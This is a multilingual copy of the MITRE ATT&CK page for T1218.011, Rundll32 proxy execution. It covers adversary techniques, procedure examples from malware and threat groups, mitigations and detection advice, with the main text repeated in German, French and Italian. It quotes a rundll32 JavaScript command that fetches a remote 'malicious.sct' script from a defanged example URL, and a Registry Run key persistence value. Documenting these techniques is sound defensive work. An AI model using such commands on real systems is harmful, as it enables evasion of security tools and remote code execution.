1. Home
  2. Techniques
  3. Enterprise
  4. Signed Binary Proxy Execution
  5. Rundll32

Signed Binary Proxy Execution: Rundll32

ID Name
T1218.001 Compiled HTML File
T1218.002 Control Panel
T1218.003 CMSTP
T1218.004 InstallUtil
T1218.005 Mshta
T1218.007 Msiexec
T1218.008 Odbcconf
T1218.009 Regsvcs/Regasm
T1218.010 Regsvr32
T1218.011 Rundll32
T1218.012 Verclsid
T1218.013 Mavinject
T1218.014 MMC

Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {{DLLname, DLLfunction}}).

Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. [1]

Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. [2]

Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.[3][4]

Angreifer können rundll32.exe missbrauchen, um die Ausführung von bösartigem Code zu verschleiern. Durch die Verwendung von rundll32.exe als Stellvertreter für die direkte Ausführung (d.h. Shared Modules) kann vermieden werden, dass Sicherheitstools ausgelöst werden, die die Ausführung des rundll32.exe-Prozesses aufgrund von Zulässigkeitslisten oder Fehlalarmen aus dem normalen Betrieb nicht überwachen. Rundll32.exe wird häufig mit der Ausführung von DLL-Nutzdaten in Verbindung gebracht (z.B.: rundll32.exe {{DLLname, DLLfunktion}}).

Rundll32.exe kann auch zum Ausführen von Systemsteuerung Item-Dateien (.cpl) über die undokumentierten shell32.dll Funktionen Control_RunDLL und Control_RunDLLAsUser verwendet werden. Ein Doppelklick auf eine .cpl-Datei führt ebenfalls zur Ausführung von rundll32.exe. (Zitat: Trend Micro CPL)

Rundll32 kann auch verwendet werden, um Skripte wie JavaScript auszuführen. Dies kann mit einer ähnlichen Syntax wie der folgenden geschehen: rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" Dieses Verhalten wurde bereits von Malware wie Poweliks verwendet. (Zitat: Dies ist eine Sicherheits-Befehlszeilenverwirrung)

Angreifer können auch versuchen, bösartigen Code vor der Analyse zu verbergen, indem sie die Art und Weise missbrauchen, in der rundll32.exe DLL-Funktionsnamen lädt. Im Rahmen der Windows-Kompatibilitätsunterstützung für verschiedene Zeichensätze prüft rundll32.exe zunächst, ob Wide/Unicode- und dann ANSI-Zeichen unterstützt werden, bevor die angegebene Funktion geladen wird (z.B. würde rundll32.exe bei dem Befehl rundll32.exe ExampleDLL.dll, ExampleFunction zunächst versuchen, ExampleFunctionW oder andernfalls ExampleFunctionA auszuführen, bevor es ExampleFunction lädt). Angreifer können daher bösartigen Code verschleiern, indem sie mehrere identische exportierte Funktionsnamen erstellen und W und/oder A an harmlose Funktionen anhängen.(Zitat: Attackify Rundll32.exe Obscurity)(Zitat: Github NoRunDll)

Les adversaires peuvent abuser de rundll32.exe pour proxyer l'exécution de code malveillant. L'utilisation de rundll32.exe, au lieu d'une exécution directe (c.-à-d. Shared Modules), peut éviter de déclencher les outils de sécurité qui peuvent ne pas surveiller l'exécution du processus rundll32.exe en raison de listes d'autorisations ou de faux positifs provenant d'opérations normales. Rundll32.exe est généralement associé à l'exécution de charges utiles DLL (ex : rundll32.exe {{nom de la DLL, fonction de la DLL}}).

Rundll32.exe peut également être utilisé pour exécuter des fichiers d'éléments (.cpl) du Panneau de configuration par le biais des fonctions non documentées shell32.dll Control_RunDLL et Control_RunDLLAsUser. Un double-clic sur un fichier .cpl entraîne également l'exécution de rundll32.exe. (Citation : Trend Micro CPL)

Rundll32 peut également être utilisé pour exécuter des scripts tels que JavaScript. Ceci peut être fait en utilisant une syntaxe similaire à celle-ci : rundll32.exe javascript :"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[ :]//www[.]example[.]com/malicious.sct")" Ce comportement a été vu utilisé par des programmes malveillants tels que Poweliks. (Citation : C'est la confusion de la ligne de commande de la sécurité)

Les adversaires peuvent également tenter de dissimuler le code malveillant à l'analyse en abusant de la manière dont rundll32.exe charge les noms de fonctions DLL. Dans le cadre de la prise en charge de la compatibilité Windows pour divers jeux de caractères, rundll32.exe vérifiera d'abord les fonctions supportant les caractères wide/Unicode puis ANSI avant de charger la fonction spécifiée (par exemple, étant donné la commande rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe tentera d'abord d'exécuter ExampleFunctionW, ou à défaut ExampleFunctionA, avant de charger ExampleFunction). Les adversaires peuvent donc obscurcir le code malveillant en créant plusieurs noms de fonctions exportées identiques et en ajoutant W et/ou A aux noms inoffensifs.(Citation : Attackify Rundll32.exe Obscurity)(Citation : Github NoRunDll)

Gli avversari possono abusare di rundll32.exe per delegare l'esecuzione di codice maligno. Usando rundll32.exe, vice l'esecuzione diretta (cioè Shared Modules, si può evitare di innescare strumenti di sicurezza che potrebbero non monitorare l'esecuzione del processo rundll32.exe a causa di allowlists o falsi positivi da operazioni normali. Rundll32.exe è comunemente associato all'esecuzione di payload DLL (es: rundll32.exe {{DLLname, DLLfunction}}).

Rundll32.exe può anche essere usato per eseguire file Control Panel Item (.cpl) attraverso le funzioni non documentate shell32.dll Control_RunDLL e Control_RunDLLAsUser. Il doppio clic su un file .cpl provoca anche l'esecuzione di rundll32.exe. (Citazione: Trend Micro CPL)

Rundll32 può anche essere usato per eseguire script come JavaScript. Ciò può essere fatto usando una sintassi simile a questa: rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" Questo comportamento è stato visto usato da malware come Poweliks. (Citazione: Questo è Confusione della linea di comando di sicurezza)

Gli avversari possono anche tentare di oscurare il codice maligno dall'analisi abusando del modo in cui rundll32.exe carica i nomi delle funzioni DLL. Come parte del supporto di compatibilità di Windows per vari set di caratteri, rundll32.exe controllerà prima le funzioni supportate da caratteri wide/Unicode e poi ANSI prima di caricare la funzione specificata (ad esempio, dato il comando rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe tenterà prima di eseguire ExampleFunctionW, o in mancanza ExampleFunctionA, prima di caricare ExampleFunction). Gli avversari possono quindi oscurare il codice maligno creando più nomi di funzioni esportate identiche e aggiungendo W e/o A a quelle innocue.(Citazione: Attackify Rundll32.exe Obscurity)(Citazione: Github NoRunDll)

Login
ID: T1218.011
Sub-technique of:  T1218
Tactic: Defense Evasion
Platforms: Windows
Permissions Required: User
Defense Bypassed: Anti-virus, Application control, Digital Certificate Validation
Contributors: Casey Smith; Gareth Phillips, Seek Ltd.; Ricardo Dias
Version: 1.1
Created: 23 January 2020
Last Modified: 14 October 2021
Translations:  DE FR IT EN
Provided by LAYER 8

Procedure Examples

ID Name Description
S0045 ADVSTORESHELL

ADVSTORESHELL has used rundll32.exe in a Registry value to establish persistence.[5]
G0073 APT19

APT19 configured its payload to inject into the rundll32.exe.[6]
G0007 APT28

APT28 executed CHOPSTICK by using rundll32 commands such as rundll32.exe "C:\Windows\twain_64.dll". APT28 also executed a .dll for a first stage dropper using rundll32.exe. An APT28 loader Trojan saved a batch script that uses rundll32 to execute a DLL payload.[7][5][8][9][10][11]
G0016 APT29

APT29 has used Rundll32.exe to execute payloads.[12][13][14]
G0022 APT3

APT3 has a tool that can run DLLs.[15]
G0050 APT32

APT32 malware has used rundll32.exe to execute an initial infection process.[16]
G0082 APT38

APT38 has used rundll32.exe to execute binaries, scripts, and Control Panel Item files and to execute code via proxy to avoid triggering security tools.[17]
G0096 APT41

APT41 has used rundll32.exe to execute a loader.[18]
S0438 Attor

Attor's installer plugin can schedule rundll32.exe to load the dispatcher.[19]
S0606 Bad Rabbit

Bad Rabbit has used rundll32 to launch a malicious DLL as C:Windowsinfpub.dat.[20]
S0268 Bisonal

Bisonal uses rundll32.exe to execute as part of the Registry Run key it adds: HKEY_CURRENT_USER \Software\Microsoft\Windows\CurrentVersion\Run\"vert" = "rundll32.exe c:\windows\temp\pvcu.dll , Qszdez".[21]
S0520 BLINDINGCAN

BLINDINGCAN has used Rundll32 to load a malicious DLL.[22]
G0108 Blue Mockingbird

Blue Mockingbird has executed custom-compiled XMRIG miner DLLs using rundll32.exe.[23]
S0635 BoomBox

BoomBox can use RunDLL32 for execution.[24]
S0204 Briba

Briba uses rundll32 within Registry Run Keys / Startup Folder entries to execute malicious DLLs.[25]
G0008 Carbanak

Carbanak installs VNC server software that executes through rundll32.[26]
S0154 Cobalt Strike

Cobalt Strike can use rundll32.exe to load DLL from the command line.[27]
S0244 Comnie

Comnie uses Rundll32 to load a malicious DLL.[28]
G0052 CopyKittens

CopyKittens uses rundll32 to load various tools on victims, including a lateral movement tool named Vminst, Cobalt Strike, and shellcode.[29]
S0137 CORESHELL

CORESHELL is installed via execution of rundll32 with an export named "init" or "InitW."[30]
S0046 CozyCar

The CozyCar dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main CozyCar component.[31]
S0255 DDKONG

DDKONG uses Rundll32 to ensure only a single instance of itself is running at once.[32]
S0554 Egregor

Egregor has used rundll32 during execution.[33]
S0081 Elise

After copying itself to a DLL file, a variant of Elise calls the DLL file using rundll32.exe.[34]
S0082 Emissary

Variants of Emissary have used rundll32.exe in Registry values added to establish persistence.[35]
S0634 EnvyScout

EnvyScout has the ability to proxy execution of malicious files with Rundll32.[24]
S0568 EVILNUM

EVILNUM can execute commands and scripts through rundll32.[36]

S0512 FatDuke

FatDuke can execute via rundll32.[37]
S0267 FELIXROOT

FELIXROOT uses Rundll32 for executing the dropper program.[38][39]
S0143 Flame

Rundll32.exe is used as a way of executing Flame at the command-line.[40]
G0047 Gamaredon Group

Gamaredon Group malware has used rundll32 to launch additional malicious components.[41]
S0032 gh0st RAT

A gh0st RAT variant has used rundll32 for execution.[42]
S0342 GreyEnergy

GreyEnergy uses PsExec locally in order to execute rundll32.exe at the highest privileges (NTAUTHORITY\SYSTEM).[39]
G0125 HAFNIUM

HAFNIUM has used rundll32 to load malicious DLLs.[43]
S0260 InvisiMole

InvisiMole has used rundll32.exe for execution.[44]
S0044 JHUHUGIT

JHUHUGIT is executed using rundll32.exe.[45][46]
S0250 Koadic

Koadic can use Rundll32 to execute additional payloads.[47]
S0356 KONNI

KONNI has used Rundll32 to execute its loader for privilege escalation purposes.[48]
S0236 Kwampirs

Kwampirs uses rundll32.exe in a Registry value added to establish persistence.[49]
S0167 Matryoshka

Matryoshka uses rundll32.exe in a Registry Run key value for execution as part of its persistence mechanism.[50]
S0576 MegaCortex

MegaCortex has used rundll32.exe to load a DLL for file encryption.[51]
S0256 Mosquito

Mosquito's launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability.[52]
G0069 MuddyWater

MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.[53]
S0637 NativeZone

NativeZone has used rundll32 to execute a malicious DLL.[54]
S0353 NOKKI

NOKKI has used rundll32 for execution.[55]
S0368 NotPetya

NotPetya uses rundll32.exe to install itself on remote systems when accessed via PsExec or wmic.[56]
S0518 PolyglotDuke

PolyglotDuke can be executed using rundll32.exe.[37]
S0139 PowerDuke

PowerDuke uses rundll32.exe to load.[57]
S0113 Prikormka

Prikormka uses rundll32.exe to load its DLL.[58]
S0147 Pteranodon

Pteranodon executes functions using rundll32.exe.[59]
S0196 PUNCHBUGGY

PUNCHBUGGY can load a DLL using Rundll32.[60]
S0650 QakBot

QakBot can use Rundll32.exe to enable C2 communication.[61][62][63][64]
S0481 Ragnar Locker

Ragnar Locker has used rundll32.exe to execute components of VirtualBox.[65]
S0148 RTM

RTM runs its core DLL file using rundll32.exe.[66][67]
S0074 Sakula

Sakula calls cmd.exe to run various DLL files via rundll32.[68]
G0034 Sandworm Team

Sandworm Team used a backdoor which could execute a supplied DLL using rundll32.exe.[69]

S0382 ServHelper

ServHelper contains a module for downloading and executing DLLs that leverages rundll32.exe.[70]
S0589 Sibot

Sibot has executed downloaded DLLs with rundll32.exe.[71]
S0142 StreamEx

StreamEx uses rundll32 to call an exported function.[72]
S0559 SUNBURST

SUNBURST used Rundll32 to execute payloads.[13]

G0092 TA505

TA505 has leveraged rundll32.exe to execute malicious DLLs.[73][70]
G0127 TA551

TA551 has used rundll32.exe to load malicious DLLs.[74]
S0452 USBferry

USBferry can execute rundll32.exe in memory to avoid detection.[75]

S0141 Winnti for Windows

The Winnti for Windows installer loads a DLL using rundll32.[76]
S0412 ZxShell

ZxShell has used rundll32.exe to execute other DLLs and named pipes.[77]

Mitigations

ID Mitigation Description
M1050 Exploit Protection

Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass application control.

Detection

ID Data Source Data Component
DS0017 Command Command Execution
DS0022 File File Metadata
DS0011 Module Module Load
DS0009 Process Process Creation

Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity.

Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls.

Verwenden Sie die Prozessüberwachung, um die Ausführung und die Argumente von rundll32.exe zu überwachen. Vergleichen Sie die jüngsten Aufrufe von rundll32.exe mit früheren Aufrufen bekannter guter Argumente und geladener DLLs, um anomale und potenziell schädliche Aktivitäten festzustellen.

Die mit dem Aufruf von rundll32.exe verwendeten Befehlsargumente können ebenfalls nützlich sein, um die Herkunft und den Zweck der geladenen DLL zu bestimmen. Die Analyse von DLL-Exporten und der Vergleich mit Laufzeitargumenten kann nützlich sein, um verschleierte Funktionsaufrufe aufzudecken.

Utilisez la surveillance des processus pour contrôler l'exécution et les arguments de rundll32.exe. Comparez les invocations récentes de rundll32.exe avec l'historique des bons arguments connus et des DLL chargées pour déterminer les activités anormales et potentiellement adverses.

Les arguments de commande utilisés avec l'invocation de rundll32.exe peuvent également être utiles pour déterminer l'origine et le but de la DLL chargée. L'analyse des exportations de DLL et la comparaison avec les arguments d'exécution peuvent être utiles pour découvrir des appels de fonctions obscurcis.

Utilizzi il monitoraggio dei processi per monitorare l'esecuzione e gli argomenti di rundll32.exe. Confronti le recenti invocazioni di rundll32.exe con la storia precedente di argomenti noti e DLL caricate per determinare attività anomale e potenzialmente avversarie.

Anche gli argomenti di comando usati con l'invocazione di rundll32.exe possono essere utili per determinare l'origine e lo scopo della DLL caricata. Analizzare le esportazioni di DLL e confrontarle con gli argomenti di runtime può essere utile per scoprire chiamate di funzioni offuscate.

References

  1. Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.
  2. B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.
  3. Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021.
  4. gtworek. (2019, December 17). NoRunDll. Retrieved August 23, 2021.
  5. Bitdefender. (2015, December). APT28 Under the Scope. Retrieved February 23, 2017.
  6. Ahl, I. (2017, June 06). Privileges and Credentials: Phished at the Request of Counsel. Retrieved May 17, 2018.
  7. Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
  8. Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.
  9. Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.
  10. ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.
  11. NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.
  12. MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 30, 2020.
  13. MSTIC, CDOC, 365 Defender Research Team. (2021, January 20). Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop . Retrieved January 22, 2021.
  14. Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.
  15. Chen, X., Scott, M., Caselden, D.. (2014, April 26). New Zero-Day Exploit targeting Internet Explorer Versions 9 through 11 Identified in Targeted Attacks. Retrieved January 14, 2016.
  16. Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.
  17. DHS/CISA. (2020, August 26). FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks. Retrieved September 29, 2021.
  18. Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.
  19. Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020.
  20. Mamedov, O. Sinitsyn, F. Ivanov, A.. (2017, October 24). Bad Rabbit ransomware. Retrieved January 28, 2021.
  21. Hayashi, K., Ray, V. (2018, July 31). Bisonal Malware Used in Attacks Against Russia and South Korea. Retrieved August 7, 2018.
  22. US-CERT. (2020, August 19). MAR-10295134-1.v1 – North Korean Remote Access Trojan: BLINDINGCAN. Retrieved August 19, 2020.
  23. Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020.
  24. MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021.
  25. Ladley, F. (2012, May 15). Backdoor.Briba. Retrieved February 21, 2018.
  26. Kaspersky Lab's Global Research and Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved August 23, 2018.
  27. Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021.
  28. Grunzweig, J. (2018, January 31). Comnie Continues to Target Organizations in East Asia. Retrieved June 7, 2018.
  29. ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017.
  30. Anthe, C. et al. (2015, October 19). Microsoft Security Intelligence Report Volume 19. Retrieved December 23, 2015.
  31. F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015.
  32. Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018.
  33. Rochberger, L. (2020, November 26). Cybereason vs. Egregor Ransomware. Retrieved December 30, 2020.
  34. Falcone, R., et al.. (2015, June 16). Operation Lotus Blossom. Retrieved February 15, 2016.
  35. Falcone, R. and Miller-Osborn, J. (2016, February 3). Emissary Trojan Changelog: Did Operation Lotus Blossom Cause It to Evolve?. Retrieved February 15, 2016.
  36. Adamitis, D. (2020, May 6). Phantom in the Command Shell. Retrieved January 28, 2021.
  37. Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.
  38. Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018.
  39. Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018.
  1. sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex malware for targeted attacks. Retrieved September 6, 2018.
  2. Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.
  3. Sabo, S. (2018, February 15). Musical Chairs Playing Tetris. Retrieved February 19, 2018.
  4. Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021.
  5. Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.
  6. F-Secure. (2015, September 8). Sofacy Recycles Carberp and Metasploit Code. Retrieved August 3, 2016.
  7. Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.
  8. Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018.
  9. Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020.
  10. Symantec Security Response Attack Investigation Team. (2018, April 23). New Orangeworm attack group targets the healthcare sector in the U.S., Europe, and Asia. Retrieved May 8, 2018.
  11. Minerva Labs LTD and ClearSky Cyber Security. (2015, November 23). CopyKittens Attack Group. Retrieved September 11, 2017.
  12. Del Fierro, C. Kessem, L.. (2020, January 8). From Mega to Giga: Cross-Version Comparison of Top MegaCortex Modifications. Retrieved February 15, 2021.
  13. ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018.
  14. Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.
  15. Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021.
  16. Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018.
  17. Chiu, A. (2016, June 27). New Ransomware Variant "Nyetya" Compromises Systems Worldwide. Retrieved March 26, 2019.
  18. Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.
  19. Cherepanov, A.. (2016, May 17). Operation Groundbait: Analysis of a surveillance toolkit. Retrieved May 18, 2016.
  20. Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.
  21. Elovitz, S. & Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated & Spear-Phishing Group. Retrieved February 26, 2018.
  22. CS. (2020, October 7). Duck Hunting with Falcon Complete: A Fowl Banking Trojan Evolves, Part 2. Retrieved September 27, 2021.
  23. Rainey, K. (n.d.). Qbot. Retrieved September 27, 2021.
  24. Cyberint. (2021, May 25). Qakbot Banking Trojan. Retrieved September 27, 2021.
  25. Morrow, D. (2021, April 15). The rise of QakBot. Retrieved September 27, 2021.
  26. SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020.
  27. Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.
  28. Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020.
  29. Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, July 30). Sakula Malware Family. Retrieved January 26, 2016.
  30. Cherepanov, A.. (2017, July 4). Analysis of TeleBots’ cunning backdoor . Retrieved June 11, 2020.
  31. Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved May 28, 2019.
  32. Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.
  33. Cylance SPEAR Team. (2017, February 9). Shell Crew Variants Continue to Fly Under Big AV’s Radar. Retrieved February 15, 2017.
  34. Salem, E. (2019, April 25). Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware. Retrieved May 28, 2019.
  35. Duncan, B. (2021, January 7). TA551: Email Attack Campaign Switches from Valak to IcedID. Retrieved March 17, 2021.
  36. Chen, J.. (2020, May 12). Tropic Trooper’s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020.
  37. Cap, P., et al. (2017, January 25). Detecting threat actors in recent German industrial attacks with Windows Defender ATP. Retrieved February 8, 2017.
  38. Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019.